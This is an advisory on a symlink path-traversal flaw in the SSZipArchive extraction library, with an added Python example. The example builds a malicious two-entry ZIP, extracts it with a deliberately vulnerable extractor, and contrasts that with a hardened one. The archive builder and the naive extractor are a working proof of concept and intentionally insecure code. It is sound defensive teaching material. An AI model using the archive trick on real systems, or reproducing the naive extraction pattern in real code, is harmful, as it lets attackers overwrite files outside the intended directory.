SSZipArchive is vulnerable to Path Traversal
98
Critical Risk
Affected versions of the package are vulnerable to Path Traversal because SSZipArchive does not validate symlink targets during extraction. Regular file paths are checked so that they cannot resolve outside the destination directory, but symlink entries in a ZIP archive are not subjected to the same check. An attacker can exploit this by placing a symlink entry early in the archive (for example as the first entry) whose target is an arbitrary location on the filesystem, followed by a regular file entry with the same name. When the library extracts the second entry it calls fopen() on a path that is now a symlink, the open follows the link, and the entry's contents are written to the symlink's target path, potentially overwriting sensitive files outside the intended extraction directory. The two conditions that make this work are therefore a symlink target that is never validated against the destination directory, and a file open that follows an existing symlink instead of refusing it.
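The following is an added illustration written for this page, not SSZipArchive's own (Objective-C) code. It is in Python so it can be run anywhere: it constructs the two-entry archive described above in memory (entry name `payload`, the file contents and the victim path are made up), runs it through a deliberately naive extractor that mirrors the vulnerable behaviour (lexical name check only, plain open() that follows symlinks), and then through a hardened extractor that validates symlink targets against the destination and creates files with O_EXCL|O_NOFOLLOW after an lstat-style existence check.

```python
"""Added example for the SSZipArchive symlink advisory: constructed archive,
naive extractor (vulnerable), hardened extractor.  Not SSZipArchive code."""
import io
import os
import stat
import tempfile
import warnings
import zipfile

LINK_NAME = "payload"                     # hypothetical name shared by both entries
PAYLOAD = b"attacker controlled content\n"  # made-up file contents


def build_malicious_zip(target: str) -> bytes:
    """Constructed test archive: entry 1 is a symlink named LINK_NAME whose
    target is `target` (outside the extraction dir); entry 2 is a regular
    file with the same name.  Entry order is the whole point."""
    buf = io.BytesIO()
    with warnings.catch_warnings():
        warnings.simplefilter("ignore")            # zipfile warns on duplicate names
        with zipfile.ZipFile(buf, "w") as zf:
            link = zipfile.ZipInfo(LINK_NAME)
            link.create_system = 3                 # Unix: mode bits live in external_attr
            link.external_attr = (stat.S_IFLNK | 0o777) << 16
            zf.writestr(link, target)              # a symlink entry's data is its target
            zf.writestr(LINK_NAME, PAYLOAD)
    return buf.getvalue()


def is_symlink_entry(info: zipfile.ZipInfo) -> bool:
    return stat.S_ISLNK(info.external_attr >> 16)


def _lexically_inside(dest: str, name: str) -> bool:
    """The check file *names* typically get: rejects '../x' and absolute
    names by normalising the joined path as a string."""
    full = os.path.normpath(os.path.join(dest, name))
    return full == dest or full.startswith(dest + os.sep)


def naive_extract(data: bytes, dest: str) -> None:
    """Vulnerable behaviour: names are checked, symlink targets are not, and a
    later entry is written with a plain open(), which follows the link."""
    dest = os.path.abspath(dest)
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if not _lexically_inside(dest, info.filename):
                raise ValueError(f"refusing {info.filename!r}")
            path = os.path.join(dest, info.filename)
            if is_symlink_entry(info):
                os.symlink(zf.read(info).decode(), path)   # target never validated
            else:
                with open(path, "wb") as f:                # like fopen(): follows symlink
                    f.write(zf.read(info))


def safe_extract(data: bytes, dest: str) -> None:
    """Hardened: (1) a symlink target must also stay lexically inside dest,
    (2) nothing may already exist at the path (catches the duplicate-name trick),
    (3) regular files are created with O_EXCL|O_NOFOLLOW, never via a link."""
    dest = os.path.realpath(dest)
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if not _lexically_inside(dest, info.filename):
                raise ValueError(f"refusing {info.filename!r}")
            path = os.path.join(dest, info.filename)
            if os.path.lexists(path):                      # lstat: sees dangling links too
                raise ValueError(f"refusing to overwrite existing {path!r}")
            if is_symlink_entry(info):
                target = zf.read(info).decode()
                rel = os.path.join(os.path.dirname(info.filename), target)
                if os.path.isabs(target) or not _lexically_inside(dest, rel):
                    raise ValueError(f"symlink {info.filename!r} escapes dest: {target!r}")
                os.symlink(target, path)
            else:
                flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
                with os.fdopen(os.open(path, flags, 0o644), "wb") as f:
                    f.write(zf.read(info))


def demonstrate() -> dict:
    """Run both extractors against the constructed archive and report outcomes."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        victim = os.path.join(tmp, "outside.txt")      # sits outside both extraction dirs
        data = build_malicious_zip(victim)

        for label, extractor in (("naive", naive_extract), ("safe", safe_extract)):
            with open(victim, "wb") as f:
                f.write(b"original\n")
            dest = os.path.join(tmp, label)
            os.mkdir(dest)
            try:
                extractor(data, dest)
                results[f"{label}_rejected"] = False
            except ValueError:
                results[f"{label}_rejected"] = True
            with open(victim, "rb") as f:
                results[f"{label}_overwrote_outside"] = f.read() == PAYLOAD
    return results
```

Running `demonstrate()` shows the naive extractor silently replacing `outside.txt` with the archive's payload while the hardened one raises on the very first entry and leaves the file untouched. Two caveats a reviewer would add: the lexical target check does not see through a chain of links created by earlier entries (a symlink into a directory that is itself a symlink out), which is why the O_EXCL|O_NOFOLLOW open is the check that actually matters, and a common alternative design is to defer creating any symlink until every regular file has been written, so that no file open can ever pass through an archive-supplied link.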
You are affected if you are using a version that falls within the vulnerable range.
SSZipArchive is vulnerable to Path Traversal in versions 0.0.1 - 2.5.3.
Upgrade SSZipArchive to a release outside the vulnerable range (2.5.4 or later). Until you can upgrade, do not extract untrusted archives into directories that contain files you care about, and treat any archive containing symlink entries as suspect.